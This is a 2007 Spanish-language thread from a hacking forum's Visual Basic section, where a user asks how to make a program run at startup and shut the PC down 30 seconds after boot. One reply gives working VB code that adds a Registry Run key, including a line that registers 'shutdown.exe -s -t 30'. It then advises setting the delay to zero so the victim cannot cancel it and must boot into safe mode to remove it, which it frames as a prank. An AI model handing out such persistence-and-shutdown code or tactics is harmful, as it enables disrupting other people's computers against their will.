hacker

Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
24 de Julio de 2008, 02:10:59
Noticias: Te gusta el nuevo diseño?
Opina al respecto en:
Para ver este enlace Registrate o Inicia Sesion
Este Tema

+  Foros pOrtal Hacker
|-+  Programacion
| |-+  Programación en general
| | |-+  Visual Basic (Moderadores: ranefi, crypto136, ziBboh, >> s E t H <<)
| | | |-+  Como aria para q se ejecute ?
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Como aria para q se ejecute ?  (Leído 295 veces)
Cheatmaster
NZ2
**
Desconectado Desconectado

Ver Perfil
« : 20 de Febrero de 2007, 01:06:48 »

Hola me gustaria saber como ago para q siempre que encianda el pc, el programa se ejecute Como se aria ??

es que quiero hacer, que cuando pasen 30 sg el pc se apague despues de averlo encendido
Frugulletti
NZ1
*
Desconectado Desconectado

Member, pOrtal HAcker

Ver Perfil
« Respuesta #1 : 21 de Febrero de 2007, 07:14:38 »

Es simple, colocas tu aplicación o un acceso directo de ella en la carpeta Inicio en "C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio", no es la unica pero si la más simple creo yo...
Korpex
Visitante
« Respuesta #2 : 23 de Febrero de 2007, 03:00:58 »

Código:
sub Form_load()
Shell ("reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Nombrequequieras /t REG_SZ /d " & Chr(34) & App.Path & "\" & App.EXEName & ".exe" & Chr(34) & " /f")
end sub

Esto lo que hace es agregar al registro a la clave que almacena los programas que se inician con windows la ruta de tu aplicación, del mismo programa que ejecuta esta linea de codigo.

Código:
Shell ("reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Lavadora /t REG_SZ /d " & Chr(34) & "shutdown.exe -s -t 30 " & Chr(34) & " /f")
Esto hace casi lo mismo, agrega a la misma entrada, pero en vez de poner la ruta de tu aplicación, pones directamente los comandos que quieres ejecutar.. en este caso shutdown.exe para apagar el PC. Para más información sobre el comando reg, no dude en visitar la consola de windows Cheesy xD! o google en su defecto. XD

PD: no dejes 30 segundos o podrían anularlo y desinfectar.. (borrar la clave del registro) Ponlo  a 00 y se va a mear de risa.. xDDDDD tendrá que reiniciar a modo prueba de fallos para quitarlo.
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  

Ingresar con nombre de usuario, contraseña y duración de la sesión